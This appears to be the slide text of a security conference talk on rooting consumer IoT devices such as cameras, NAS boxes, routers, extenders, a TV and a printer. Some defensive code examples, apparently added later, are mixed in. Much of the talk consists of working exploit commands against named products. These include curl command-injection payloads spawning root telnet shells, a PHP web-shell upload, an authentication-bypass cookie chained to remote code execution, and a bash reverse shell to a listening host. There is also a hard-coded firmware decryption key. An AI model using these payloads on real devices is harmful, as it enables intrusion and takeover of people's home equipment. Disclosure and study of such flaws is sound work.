
About Us 


• @Zenofex - Founder of Exploitee.rs, Senior Research Scientist at Cylance, Founder of Pastecry.pt 

• @cj_000 - Works at Draper, does hardware/software exploitation things... 

• @0x00string - Hacker, Recreational Bug User, Senior Research Engineer 

• @maximus64_ - A recent graduate of the University of Central Florida who is a master of the soldering iron. 

Note: This presentation and thoughts are ours, and ours alone, and have no relationship to our employers 
Other Members 


• [mbm] (@mbmwashere) - Co-founder of OpenWRT 

• Gynophage (@gyno_lbs) - DEF CON CTF organizer 

• @n0nst1ck - "Boring" corp-sec dude 

• Saurik (@saurik) - Creator of Cydia 

• Tdweng (@tdweng) - Master software developer 

• Cody Walker- "Web platform is best platform" 

• Ian - "Praises our all mighty internet overlords" 
















About Exploitee.rs 

• The artists formerly known as GTVHacker 

• Presented at a bunch of stuff (Blackhat, DEF CON, BSides) 

• Released root methods for multiple generations of Google TV devices 
and other embedded systems 

• Televisions, Blu-Ray Players, Refrigerators, and more 

• Pushed for DMCA exemptions in jailbreaking smart devices 

• Maintains network of sites documenting vulnerabilities 

• Community and Group driven 
Types of Vulnerabilities / Exploits 


• UART (Universal Asynchronous Receiver Transmitter) - 

  • Debug interface that is usually present 

  • Like a serial port. May gain full access from this alone 

• JTAG (Joint Test Action Group) - 

  • Debug interface that allows full CPU access 

  • Often hard to find, closed, and can use unknown instructions 

• Pull and Program - 

  • Remove the flash and reprogram - Difficult, but often not protected 

• LFD - Local File Disclosure, extracting information from a device 

  • Information disclosure 

• RCE - Remote Code Execution 

  • Payload execution without physical access 
Plan of Attack 


Get The Firmware Or Die Trying 

• UART, JTAG, Debug Headers 

• Sometimes the firmware update URL is printed to UART / debug logs 

• Mobile/Desktop App RE 

• MiTM Network Traffic 

• Dump Flash 

Find More Bugs 
Tenvis T8810 

• IP Cam 

• Pan, Tilt, Zoom 

• Wireless 

• Two Way Audio 


Tenvis T8810 UART Shell 




• UART 

• Linux needs username and password 

• Obvious ones didn't work 

• U-boot 

• 3 second timeout - press any key 

• setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh; sf probe 0 0; sf read ${loadaddr} ${sfkernel} ${filesize}; bootm 
Tenvis T8810 Post-Auth Brick 


• Post-Auth Semi-Permanent Brick (admin/admin) 

• curl 'http://192.168.1.88/cgi-bin/hi3510/param.cgi' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' --data 'cmd=setwirelessattr&cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&-wf_ssid=%0Assidgoesheres%0D&-wf_auth=3&-wf_mode=%0Dabcdef&-wf_enc=0&-wf_enable=1&-wf_key=key12345' --compressed 

• 0x0D = Carriage Return 

• 0x0A = New Line 

• Causes the main app to segfault, possible corruption bug 

• Recovery possible via UART 
Samsung SDR-3102N Security DVR 


• 4 channel Security DVR 






Samsung SDR-3102N Security DVR UART 


• UART Located on board 

• Interrupt U-Boot Shell 

• Add to bootargs 

• init=/bin/sh 

• console=ttyAMA0,115200 

• Boots to kernel 

• Exploring the file system... 
Samsung SDR-3102N Security DVR USB Root 


• Script detects a FAT USB Drive 

• Executes "diag_1673" if it exists 

• Create a file named "diag_1673" 

#!/bin/sh 
/bin/busybox telnetd -l /bin/sh 

• Root! 


DIAG_BIN=diag_1673 

USB=`fdisk -l | grep FAT | cut -d ' ' -f 1 | grep -e `   # grep pattern is cut off on the slide 

if [ "$USB" != "" ]; then 
    mount $USB /home/factory 
    if [ -f /home/factory/$DIAG_BIN ]; then 
        /root/utils/diswdt 
        chmod +x /home/factory/$DIAG_BIN 
        /home/factory/$DIAG_BIN & 
    else 
        umount /home/factory 
        dvr_run 
    fi 
else 
    dvr_run 
fi 
Samsung SDR-3102N Security DVR Facepalm 


• Quick search of "diag_1673" finds a PDF 































Samsung SL-M3320ND Printer 


Samsung 600 MHz Cortex-A5 with 128 MB DDR SODIMM 







Samsung SL-M3320ND Printer NAND Backup 

• NAND Backup, in the event something goes wrong 











Samsung SL-M3320ND Printer Modifications 

• Not Signed, modify the toner level to always read 100% 
SL-M3320ND 



Black Toner Cartridge 

Status: 
Remaining: 100 % 
Impression: 1972 Impressions 
Capacity: 5.0 K 
Model ID: MLT-D203S 
Serial Number: CRUM-13080257215 
Chromecast (Gen 1) 


Original Chromecast 

• We've rooted this device the first time 

• Helped with the second time too! 
Marvell 88DE3005 (DE3005-A1) 



Chromecast (Gen 1) NAND Flash 


• Initial release had a vulnerable bootloader which allowed booting of an unsigned image 

  • Patched in FW ver. 12840 

• failOverflow released an additional bootloader exploit 

  • Also patched! 

• Downgrade to the vulnerable version with a NAND flash programmer using an STM32F4Discovery 

Secure boot is also enabled 
Chromecast (Gen 1) NAND Downgrade 

• Wire the NAND flash to the STM32F4Discovery board 

• Calculate ECC for the bootloader image 

• Erase and write in the new bootloader 

• Now you can use the original exploit to root your Chromecast 
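Step two above, recomputing the ECC, is the part that is easy to get wrong: NAND controllers store a parity word beside each sector, and a page whose data changed but whose ECC did not is either "corrected" back or rejected on read. The following is an added example, not code from the talk, of a generic Hamming-style single-bit-correcting ECC over 256-byte sectors. The bit layout is my own assumption; the Marvell controller in this device, like every real controller, has its own layout and sector size. It shows the parity computation, the correction pass a controller performs on read, and the per-sector recomputation needed after an image is patched.

```python
# Added example: generic Hamming-style NAND ECC (layout is an assumption,
# not any particular controller's format).

SECTOR = 256      # bytes protected per ECC word (assumption)
ADDR_BITS = 11    # 8 bits of byte index + 3 bits of bit index = 2048 bit addresses


def nand_ecc(sector: bytes) -> int:
    """Return a 22-bit ECC word for one 256-byte sector.

    For each address bit k there is a parity pair:
      bit 2k   = XOR of all set data bits whose bit address has bit k clear
      bit 2k+1 = XOR of all set data bits whose bit address has bit k set
    """
    if len(sector) != SECTOR:
        raise ValueError("sector must be exactly %d bytes" % SECTOR)
    ecc = 0
    for k in range(ADDR_BITS):
        even = odd = 0
        for i, byte in enumerate(sector):
            for j in range(8):
                if (byte >> j) & 1:
                    if (((i << 3) | j) >> k) & 1:
                        odd ^= 1
                    else:
                        even ^= 1
        ecc |= (even << (2 * k)) | (odd << (2 * k + 1))
    return ecc


def correct_sector(sector: bytes, stored_ecc: int):
    """Check a sector against the ECC word stored with it.

    Returns (data, status): 0 = clean, 1 = one data bit corrected,
    2 = the ECC word itself was corrupted (data untouched), -1 = uncorrectable.
    """
    syndrome = nand_ecc(sector) ^ stored_ecc
    if syndrome == 0:
        return sector, 0
    pairs = [(syndrome >> (2 * k)) & 3 for k in range(ADDR_BITS)]
    # A single flipped data bit flips exactly one bit of every parity pair,
    # and which bit flipped spells out the address of the bad bit.
    if all(p in (1, 2) for p in pairs):
        addr = 0
        for k, p in enumerate(pairs):
            if p == 2:
                addr |= 1 << k
        fixed = bytearray(sector)
        fixed[addr >> 3] ^= 1 << (addr & 7)
        return bytes(fixed), 1
    # A single flipped bit inside the ECC word shows up as a one-bit syndrome.
    if bin(syndrome).count("1") == 1:
        return sector, 2
    return sector, -1


def patch_image(image: bytes, offset: int, new_bytes: bytes):
    """Apply an in-place change to a raw image and return (patched_image,
    per-sector ECC list).  Every sector must be re-parity'd after a change,
    otherwise the controller will treat the modification as a bit error."""
    if len(image) % SECTOR:
        raise ValueError("image length must be a multiple of the sector size")
    patched = bytearray(image)
    patched[offset:offset + len(new_bytes)] = new_bytes
    eccs = [nand_ecc(bytes(patched[i:i + SECTOR]))
            for i in range(0, len(patched), SECTOR)]
    return bytes(patched), eccs


if __name__ == "__main__":
    sector = bytes(range(SECTOR))                  # constructed sample data
    ecc = nand_ecc(sector)
    damaged = bytearray(sector)
    damaged[37] ^= 0x10                            # flip one bit
    data, status = correct_sector(bytes(damaged), ecc)
    print("status", status, "restored", data == sector)
```

The scheme is read-side only in this form; a writer that changes bytes in a dumped image must call `patch_image` (or the equivalent for the real controller's layout) and write the new parity words into the spare area alongside the data.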







Zmodo ZH-CJAED Smart Doorbell 


• Wi-Fi Connected Doorbell 

• Streaming Video 

• Two-way audio 

• Motion Detection 

• Purchased at Las Vegas Fry's two days ago 

• Because, what else would anyone do in Las Vegas? 
Zmodo ZH-CJAED Hardware Root 




1. Connect to UART on the back of the board 

2. When it boots it drops to a root shell 

3. There is no step three 
Zmodo ZH-CJAED Potential Software Root 



0000919c    ldr     r0, [r11, #-0x24]   {Query String} 
000091a0    mov     r1, r3              {Decoded Query}   // Happily decodes any size buffer into this fixed size buffer 
000091a4    bl      decode 
















WD MyCloud 

• Network Attached Storage Device 

• Multiple models 

  • MyCloud 

  • My Cloud Gen 2 

  • My Cloud Mirror 

  • My Cloud PR2100/PR4100 

  • My Cloud EX2 Ultra/EX2/EX4 

  • My Cloud EX2100/EX4100 

  • My Cloud DL2100/DL4100 

• Already hacked by us once 
WD MyCloud Arbitrary File Upload 


/var/www/web/jquery/uploader/multi_uploadify.php 

$ip = gethostbyaddr($_SERVER['HTTP_HOST']); 
$name = $_REQUEST['name']; 
$pwd = $_REQUEST['pwd']; 
$redirect_uri = $_REQUEST['redirect_uri']; 

//echo $name ."<br>".$pwd."<br>".$ip; 

$result = @stripslashes( @join( @file( "http://" .$ip. "/mydlink/mydlink.cgi?cmd=1&name=" . $name. "=&pwd=" . $pwd ),"" )); 

$result_1 = strstr($result , "<auth_status>0</auth_status>" ) ; 
$result_1 = substr ($result_1, 0,28); 

if (strncmp ($result ,"<auth_status>0</auth_status>",28) == 0 ) 
//if (strstr($result,"<auth_status>0</auth_status>")== 0 ) 
{ 
    header("HTTP/1.1 302 Found"); 
    header("Location: " . $redirect_uri. "?status=0" ) ; 
    exit(); 
} 

Auth based on string returned from a request to a file that does not exist. 
WD MyCloud Arbitrary File Upload 

/var/www/web/jquery/uploader/multi_uploadify.php 

if ( !empty($_FILES)) { 

    $targetPath = $_REQUEST['folder']; 
    $count = (count($_FILES["Filedata"])-2); 

    for ( $i=0; $i < $count; $i++ ) 
    { 
        $tempFile = $_FILES['Filedata']['tmp_name'][$i]; 

        if ($tempFile == "") 
        { 
            continue; 
        } 
        $new_file_name = str_replace('\\', '', $_FILES['Filedata']['name'][$i]); //amy++ 
        $targetFile = str_replace('//','/',$targetPath) . $new_file_name; 

        $status = move_uploaded_file($tempFile,$targetFile); 

File upload to an arbitrary location through a multipart form upload. 

POC: 

printf "<?php echo system(\$_GET['cmd']); ?>" > /tmp/phpshell.php 
curl -v "http://<IP>/web/jquery/uploader/multi_uploadify.php?folder=/var/www/" -F "Filedata[]=@/tmp/phpshell.php" 
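The two defects in the excerpt are that `folder` is used as the destination directory exactly as the client sent it and that the client's filename is used after removing only backslashes. The following is an added example, not WD's code: a target-path builder that re-roots the folder under a fixed storage directory outside the web root, keeps only the final component of the filename, checks the extension against an allow-list, and refuses anything that resolves outside the root. The root path and the extension list are assumptions.

```python
# Added example: building an upload destination that cannot leave its root.
import os
import posixpath

UPLOAD_ROOT = "/srv/uploads"                     # assumed: outside the web root
ALLOWED_EXT = {".jpg", ".png", ".pdf", ".txt"}   # assumed allow-list of types


def safe_upload_target(folder: str, client_filename: str,
                       root: str = UPLOAD_ROOT) -> str:
    """Return an absolute path under `root` for an uploaded file, or raise
    ValueError.  Neither the client-chosen folder nor the client-chosen
    filename can move the file out of `root`."""
    # 1. Filename: keep only the last path component, whichever separator
    #    the client used, and refuse empty / dot names and NUL bytes.
    base = posixpath.basename(client_filename.replace("\\", "/"))
    if base in ("", ".", "..") or "\x00" in base:
        raise ValueError("invalid filename")
    if posixpath.splitext(base)[1].lower() not in ALLOWED_EXT:
        raise ValueError("file type not allowed")

    # 2. Folder: always interpreted relative to root, so an absolute
    #    '/var/www/' simply becomes '<root>/var/www/'.
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, folder.lstrip("/"), base))

    # 3. Containment: after resolving '..' and symlinks the result must still
    #    be inside root.  commonpath avoids the '/srv/uploads-evil' prefix trap.
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise ValueError("path escapes upload root")
    return candidate


if __name__ == "__main__":
    print(safe_upload_target("photos", "cat.jpg"))
    print(safe_upload_target("/var/www/", "note.txt"))        # re-rooted, harmless
    for folder, name in (("../../var/www", "x.jpg"), ("photos", "shell.php")):
        try:
            safe_upload_target(folder, name)
        except ValueError as e:
            print("rejected:", folder, name, "->", e)
```

The order matters: the extension check runs on the final component only, and the containment check runs on the fully resolved path, so neither a traversal in the folder nor one hidden in the filename survives.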
WD MyCloud Arbitrary File Upload POC 










WD MyCloud Authentication Bypass 


Usage: wto [parm] 


help 

user name 
ip address 
set timeout 
get timer 
check timeout 
reset timer 
remove all 
del timeout item 
show all 
del user 


WD MyCloud uses the following to determine if a user 
is logged in: 

• User's IP 

• Session timeout 

• "isAdmin" cookie 

• "username" cookie 

PHP scripts use exec calls to the wto binary to create a 
time based local "session" for the user. 

CGI binaries also use wto to update local "session" info 
for the user 
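The state described here (an IP, a timer, and two cookies the browser fills in itself) lets the client assert its own privilege. The following is an added example, not WD's code, of the usual alternative: the server mints the session claims itself and binds them with an HMAC under a key the client never sees, so a cookie of the form isAdmin=1;username=admin, or any edited claim, fails verification. Key storage and the 15-minute lifetime are assumptions.

```python
# Added example: server-authenticated session cookie instead of client-asserted
# "isAdmin"/"username" values.
import base64
import hashlib
import hmac
import json
import secrets

# Assumed: a per-device random key generated at first boot and kept in
# root-only storage.  For the example it is created at import time.
SESSION_KEY = secrets.token_bytes(32)
SESSION_TTL = 900          # seconds (assumption)


def _b64(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _unb64(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def issue_session(username: str, is_admin: bool, now: int) -> str:
    """Mint a cookie value: base64(claims) '.' base64(HMAC-SHA256(claims)).
    The client can read the claims but cannot change them without the key."""
    claims = {"u": username, "admin": bool(is_admin),
              "exp": now + SESSION_TTL, "nonce": secrets.token_hex(8)}
    body = _b64(json.dumps(claims, sort_keys=True, separators=(",", ":")).encode())
    tag = hmac.new(SESSION_KEY, body, hashlib.sha256).digest()
    return (body + b"." + _b64(tag)).decode("ascii")


def verify_session(cookie: str, now: int):
    """Return the claims if the cookie is authentic and unexpired, else None.
    A bare 'isAdmin=1;username=admin' has no valid tag and is rejected, as is
    any cookie whose body was edited after issue."""
    try:
        body, tag = cookie.encode("ascii").rsplit(b".", 1)
        expected = hmac.new(SESSION_KEY, body, hashlib.sha256).digest()
        if not hmac.compare_digest(_unb64(tag), expected):
            return None
        claims = json.loads(_unb64(body))
    except (ValueError, UnicodeError):
        return None
    if not isinstance(claims, dict) or claims.get("exp", 0) <= now:
        return None
    return claims


def rewrite_claims(cookie: str, **changes) -> str:
    """Edit the claims of an existing cookie but keep its old tag.  This is
    what a client that changes 'admin' to true produces; verify_session must
    reject it because the tag no longer matches the body."""
    body, tag = cookie.rsplit(".", 1)
    claims = json.loads(_unb64(body.encode("ascii")))
    claims.update(changes)
    new_body = _b64(json.dumps(claims, sort_keys=True, separators=(",", ":")).encode())
    return new_body.decode("ascii") + "." + tag


if __name__ == "__main__":
    now = 1_000_000
    cookie = issue_session("guest", False, now)
    print("valid:", verify_session(cookie, now + 60))
    print("edited:", verify_session(rewrite_claims(cookie, admin=True), now + 60))
    print("legacy:", verify_session("isAdmin=1;username=admin", now + 60))
```

Because the claims carry their own expiry, no separate timer process or IP table is needed to decide whether a request is still logged in, and revocation can be handled by rotating the key or tracking nonces.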
WD MyCloud Authentication Bypass 


Network_mgr.cgi performs the following: 

• Checks if "cmd" GET variable is "cgi_get_ipv6" 

• Checks if "flag" GET variable is "1" 

• Resets the "wto" timeout and ip for the admin user 

• Checks if admin is logged in 






WD MyCloud Authentication Bypass + Root 




WD did not fix previously released post-auth RCE vulns. 

Any post auth from our wiki can be used. 
70 RCEs to choose from 
• Now all pre-auth 

POC: 

curl -v "http://192.168.86.104/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1" 
curl -i "http://192.168.86.104/web/dsdk/DsdkProxy.php" --data "';id;'" --cookie "isAdmin=1;username=admin" 
Vudu Spark 


"Vudu" Media Streaming Stick 
Only available from Walmart 
Provides VUDU streaming service 














Amazon Tap 


• Portable WiFi + Bluetooth Speaker 
• With Alexa 









Amazon Tap Teardown 




• Freescale MX6 

• Secure Boot implemented in U-Boot 



• Boots from eMMC Flash 

• So much glue 

• Full Teardown, expose the board 
Amazon Tap UART 




• UART 

• U-Boot-Output, no shell 

• Kernel - Also no shell 


• TM30/TM26 - TX/RX 

• But how can we execute code? 

• Ground the Flash! 
Amazon Tap Flash Grounding 



• Lower Resistor next to TP27 

• Ground during boot 

• Drops to U-Boot Shell 

• Defeats the timeout 

• Can't read environment variables 

• Write to memory and execute 















QNAP NAS TS-131 
















QNAP NAS TS-131 Transcoding Service 

$ lsof -i 
mytransco 8645 admin 6u IPv4 26431 0t0 TCP *:9251 (LISTEN) 

$ netstat -aen 
tcp 0 0 0.0.0.0:9251 0.0.0.0:* LISTEN 

$ ps aux 
8645 admin 3816 S /usr/local/medialibrary/bin/mytranscodesvr -s -u -debug -db /share/CACHEDEV1_DATA 
QNAP NAS TS-131 Filtering 

"rmfile" case statement 

case 1: 
    D_INFO("handling rmfile\n"); 
    D_INFO("filename = %s\n", (char *)recv_buff + 4); 
    memcpy(&dest, recv_buff, 0x2450uLL); 
    D_INFO("remove File: %s From transcoding database.\n", &v164); 
    v80 = removeFileFromDatabase(&v164, &g_newDB); 
    goto LABEL_6; 

Call to system() and StringConvert2SystemCmdFilename 

sprintf(v1, "%s%s%s.transcoding", v3, ".@__thumb/transcode", v3 + 128); 
if ( remove(v1) ) 
    fprintf(stderr, "[%s:%d] remove %s fail\n", "MyTranscodeSvr.c", 697LL, v1); 
strcpy(v1, src); 
if ( (unsigned int)StringConvert2SystemCmdFilename((__int64)v1, (__int64)src) ) 
    puts("StringConvert2SystemCmdFilename() failed."); 
sprintf(v2, "%smymediadbcmd TranscodeStatus %s 0", gpWorkingPath, v1); 
return system(v2); 


Transcoding service 

• Listens on TCP port 9251 

• Service runs as root 

• Accepts commands to transcode files 

• Command "rmfile" is vulnerable to a 
command injection 

• Sanitization routine filters most unsafe 
characters 

• Except vertical pipe! 

• Spaces are filtered 

• Use tabs between arguments 

• Filters: 0x20 I $ & 0x39 , ; = [ ] ^ ' { } % 

• Doesn't filter | or \ 
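Two changes address this class of bug, here and in the SSID injections elsewhere in the deck (Belkin, D-Link, GGMM/MUZO, and the Tenvis CR/LF crash). The following is an added example written for this page, not code from QNAP or any other vendor. It contrasts a constructed deny-list filter (not QNAP's routine, only its shape: it omits `|` and `\` and strips only 0x20) with an allow-list validator, and shows SSID/PSK handling that checks lengths and control characters and hands the values to the tool as argv elements rather than through a shell. The `iwpriv ra0 set SSID=` form is assumed by analogy with the `Key1=` call shown later in the deck.

```python
# Added example: deny-list vs allow-list validation, and argv instead of shell.
import re
import string

# Constructed deny-list in the shape of the filter described on the slide:
# a handful of metacharacters are removed, '|' and '\' are not, and only
# 0x20 counts as whitespace.  Not QNAP's code.
DENIED = frozenset(" $&;=[]^'{}%")


def denylist_filter(name: str) -> str:
    """Weak approach: remove the characters you happened to think of.
    Anything you did not list (here '|', '\\', TAB) passes straight through."""
    return "".join(c for c in name if c not in DENIED)


# Allow-list: a job may only name a plain file: alphanumerics, '.', '_', '-'.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,254}")


def allowlist_ok(name: str) -> bool:
    """Strong approach: accept only what is explicitly permitted.  Control
    characters, whitespace of any kind, '|', '\\', quotes and path separators
    all fail, as do the '.' and '..' components."""
    return bool(SAFE_NAME.fullmatch(name)) and name not in {".", ".."}


def wifi_argv(ssid: str, key: str) -> list:
    """Validate an SSID/PSK pair from a setup form and return argv lists for
    subprocess.run(argv) with no shell.  Limits follow IEEE 802.11 (SSID is
    1-32 octets) and WPA2 passphrase rules (8-63 printable ASCII).  Control
    characters, including the CR/LF that crashed the Tenvis camera, are
    rejected; ';' or '|' are allowed in an SSID but, as one argv element,
    they reach the tool as data and never as a shell operator.
    The 'iwpriv ra0 set SSID=' form is an assumption for this example."""
    raw = ssid.encode("utf-8")
    if not 1 <= len(raw) <= 32:
        raise ValueError("SSID must be 1-32 octets")
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in ssid):
        raise ValueError("SSID contains control characters")
    bad = set("\t\n\r\x0b\x0c")
    if not 8 <= len(key) <= 63 or not all(c in string.printable and c not in bad for c in key):
        raise ValueError("passphrase must be 8-63 printable ASCII characters")
    return [["iwpriv", "ra0", "set", "SSID=" + ssid],
            ["iwpriv", "ra0", "set", "Key1=" + key]]


if __name__ == "__main__":
    print(denylist_filter("clip.mp4|cmd\targ"))    # unchanged: filter misses it
    print(allowlist_ok("clip.mp4|cmd\targ"))       # False
    print(wifi_argv("Home;Net", "correct horse"))  # ';' stays inside one argument
```

The allow-list is shorter than the deny-list and needs no maintenance when a new shell or tool with new metacharacters turns up; the argv rule removes the shell from the path entirely, so even a value the validator lets through cannot be parsed as a command.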







QNAP NAS TS-131 








Belkin N300 WiFi Range Extender 

• WiFi Range Extender 

• Plugs in, extends WiFi 

• Hardware root 

• UART interface will drop to a root shell after the device completes booting 
Belkin N300 WiFi Range Extender 

• Remote Root 

• setting_hidden.asp 

• Multiple form parameters are passed to a shell without sanitization 

• Possible to inject an OS command 

• Runs as root 







Belkin N300 WiFi Range Extender Exploit 


• Limited set of commands on the box via busybox 

• Wget, ping 

• No netcat, telnet, telnetd, etc 

• Command executes as root 

• curl -i -s -k -X 'POST' -H 'Referer: http://192.168.206.1/setting_hidden.asp' -H 'Content-Type: application/x-www-form-urlencoded' --data-binary $'location_page=setting_hidden.asp&arc_action=wl_wizard_sel_ap&wl_ssid=">/dev/null;wget 10.0.0.1; echo "AAAA&wl_ssidforfile=BBBB&wl_seckey=CCCC&wl_seckeyforfile=DDDD&action=SetPassWord&formHiddenSSID=formHiddenSSIDpage&submit-url-ok=setting_checkpassword.asp&hidden_sectype=020&wl_rssi=ZXZX&wl_ssid_field=EEEE&key=FFFF&sec=wpa2a&bHiddenAP=1' 'http://192.168.206.1/goform/formBSSetSitesurvey' 
Netgear WN3000RP WiFi Extender 


The Netgear WN3000RP 

WiFi range extender 

Runs OpenWRT KAMIKAZE on 
MIPS32. 

"Move around with your mobile 
devices and keep them connected 
by giving your existing WiFi 
coverage a boost." 
Netgear WN3000RP WiFi Extender HW Root 


• The UART interface is located on the top right of the board, and runs at 57600, 8n1 

• After booting, a root shell is 
executed on the UART TTY. 

• A telnet daemon can be launched 
by executing '/usr/sbin/telnetd&' 
Netgear WN3000RP Wifi Extender Login 


|_| WIRELESS FREEDOM 
KAMIKAZE (bleeding edge, r18571) - 
 * 10 oz Vodka         Shake well with ice and strain 
 * 10 oz Triple sec    mixture into 10 shot glasses. 
 * 10 oz lime juice    Salute! 

root@WN3000RPv3:/# id 
uid=0(root) gid=0(root) 
















Linksys WRT1200AC 


• Linksys WRT1200AC 

• Two external antennas, 1.3GHz 
dual-core ARM, Wireless-AC 

• Firmware Version: 1.0.5.177401 
Linksys WRT1200AC 

• Post auth exploit: 

• Post authentication root via arbitrary file access due to improper 
sanitization of path field in media sharing setup. Sanitization takes 
place on client side, not enforced server side. 

• The following curl command is a Proof of Concept which 
demonstrates creating a file share at /. 







Linksys WRT1200AC Exploit 


• curl -i -s -k -X 'POST' -H 'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0' -H 'Content-Type: application/json; charset=UTF-8' -H 'X-JNAP-Action: http://linksys.com/jnap/storage/CreateFTPFolder' -H 'Expires: Fri, 10 Oct 2013 14:19:41 GMT' -H 'X-JNAP-Authorization: Basic <BASE64 CREDS>' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: http://192.168.1.1/ui/1.0.99.177401/dynamic/home.html' -b 'initial-tab=; visited-index=true; ui-language=en-US; modelNumber=WRT1200AC; smartmap-filter-values=computer%2Cmobile%2Cprinter%2Cother%2Clan%2CwirelessTwo%2CwirelessFive%2CwirelessFive-2; smartmap-filter-set=online-network; admin-auth=Basic%20<BASE64 CREDS>; current-applet=A2DB16C0-59B9-4C79-9BF2-E5A3A307F9C1' --data-binary $'{\"name\":\"HAXHAXHAX\",\"partitionName\":\"/dev/sda1\",\"path\":\"/../../../../../../\",\"isReadOnly\":false,\"groupsWithPermission\":[\"testuser\",\"admin\"]}' 'http://192.168.1.1/JNAP/' 
LG BPM350 










LG BPM350 Pandora Application 

• LG BP350 includes the Pandora Internet Radio App 

• The launcher script for Pandora checks USB-mapped paths for scripts before checking for the local copy 

• Create a script named PandoraApp 

• Placing it in the root of a flash drive 

• Plug it into the set top box, launch Pandora 

• Executes the script - with root privileges. 
LG BPM350 Exploit 


• The following command will add a file to a flash drive, spawn a 
reverse TCP shell when run on the player, and execute 
the Pandora app normally. 


• printf "/bin/bash -i >& /dev/tcp/192.168.100.126/4444 0>&1; 
/usr/local/bin/pandora/PandoraApp -qws -display directfb;" > 
/path/to/flashdrive/root/PandoraApp 
D-Link DCS-936L 



• The DCS-936L HD Wi-Fi Camera 

• Wide angle lens, Super HD 720p quality 

• The built-in night vision, motion 






D-Link DCS-936L Decryption Routine 


• Encrypted Firmware - how is it decrypted? 

• With Openssl, of course 

mov   r0, r3                ; argument #1 for method sprintf@PLT 
ldr   r1, =0x94f88          ; 0x40128, "openssl enc -d -aes-128-cbc -k \\\"%s\\\" -nosalt -in db.xml.export.aes -out db.xml.export >/dev/null 2>/dev/null", argument #2 for method sprintf@PLT 
ldr   r2, [fp, #-0x1c] 
bl    sprintf@PLT 
sub   r3, fp, #0x3f0 
mov   r0, r3 
bl    system@PLT 







D-Link DCS-936L Firmware Decryption 

• Firmware Update Decryption: 

• openssl aes-128-cbc -k "s7.303%_4&%&oj9e" -nosalt -d -in update.aes -out "update" || exit 

• openssl aes-128-cbc -k "s7.303%_4&%&oj9e" -nosalt -d -in update.bin.aes -out "update.bin" || exit 

• Yes, the key is "s7.303%_4&%&oj9e" (no quotes) 
D-Link DCS-936L Command Injection 


• Post authentication root via arbitrary command injection due to 
improper sanitization of the SSID field in the wifi configuration form. 

• curl -i -s -k -v -X 'POST' -H 'Host: 10.255.255.1' -H 'Referer: http://10.255.255.1/eng/admin/adv_wireless.cgi' -H 'Cookie: language=eng; usePath=null' -H 'Authorization: Basic <CREDS>' --data 'wireless=1&security=0&encryption=0&wirelessBox=on&ssid=a;telnetd%20-l%20/bin/sh%26;SSID=&mode=0&optSecurity=0&optEncryption=TKIP&key=&extAntenna=0&channel=6' 'http://10.255.255.1/eng/admin/adv_wireless.cgi' 






Lutron L-BDG2-WH Caseta Smart Bridge 

• Home Automation Smart Bridge 

• Controls up to 50 devices 

• Lights, Thermostats, Dimmers etc 
Lutron L-BDG2-WH Caseta Smart Bridge UART 

• Features an unlabeled UART 
interface 



• Drops to a root shell... 



• Digging around the filesystem 
and app, private ssh keys for 
communication with box and 
external server 


Vizio P602UI TV 


• 4K Smart TV 

• HDCP 2.2, Full Array Backlit LED 

• Sigma SOC 

• Utilizes Sigma SDK 

• Yahoo Smart TV 

• Nobody uses this anymore 

• Why was this even a thing? 
Vizio P602UI TV eMMC Reading 



• First attempt - Read the eMMC 

• Buy a board on ebay 

• Power board 

• Dump eMMC 

• See our Blackhat 2017 talk! 

• From here, examine the filesystem 

• Also added persistent code to start 
telnet, rooted via hardware 



























Vizio P602UI TV User Manual 

• TV has a HTML User Manual, opened via the "hidden" Opera Browser 

• User Manual has an update procedure 

• User Manual downloads a tar file, uses gpg for signing 

• No good vector 

• But how does it download? 

<script> 
sigma.exec("wget https:// ...."); 
</script> 
Vizio P602UI TV Custom Apps 

• Code can be executed through the hidden web browser 

• Shared Library has a whitelist of allowed domains 

• Earlier included amazon.com, netflix.com, localhost, and more 

• Current version is considerably more limited 

• Let's try something local, but how? 

• With a custom "app" 

• Web interface to upload apps to Yahoo servers, then download them to TV 
Vizio P602UI TV Exploit 


• App can open a webpage on the local filesystem 

• Not documented, but works 

URL=file://rw_data/yahoo/data/Widgets/Installed/5.com.exploiteers.1.widget/Contents/vizio.html 

• Custom HTML page contains 

<script> 
var sigma = new SigmaBridge(); 
sigma.exec("/bin/busybox telnetd -l /bin/sh -p1337"); 
</script> 

• Launch the app... Root shell on port 1337! 

AOBO Hidden Spy Camera 720P 

• So I'm totally James Bond 

• Really looks like me too, right? 

• I want to spy on someone 

• Clearly the $20 AOBO Spy Camera 
is the way to go! 
AOBO Hidden Spy Camera 720P 


• Turn it on, creates a WiFi AP 

• No target would ever find this 

• WiFi AP doesn't need a 
password 

• Ok... 

• nmap 


Nmap scan report for 192.168.0.1 
Host is up (0.019s latency). 
Not shown: 997 closed ports 
PORT     STATE SERVICE 
21/tcp   open  ftp 
23/tcp   open  telnet 
6789/tcp open  ibm-db2-admin 
MAC Address: 02:E0:4C:60:3B:0B (Unknown) 
AOBO Hidden Spy Camera 720P 


• Telnet and FTP 

• Well, maybe there is at least a 
username and password? 

• Username - Yes 

• Password - No 



$: telnet 192.168.0.1 
Trying 192.168.0.1... 
Connected to 192.168.0.1. 
Escape character is '^]'. 

anyka login: root 
welcome to file system 
[root@anyka ~]$ 
AOBO Hidden Spy Camera 720P 






CUJO Smart Internet Security Firewall 









Cujo — All the Glue 

















Cujo UART + U-Boot 







• UART under the glued pads. 

• Drop to a U-Boot shell by 
grounding the eMMC data line at 
the right spot 

• After stage 1, while stage 2 is 
booting, hold for 3-4 seconds to 
ground 













VeraEdge-US Smart Home Controller 


Vera Home Controller Hub 

Home Automation 

"Adjust Lights, Lock Doors, Set 
Thermostats and More for 
Convenience and Security. 
Control Up To 220 Devices with 
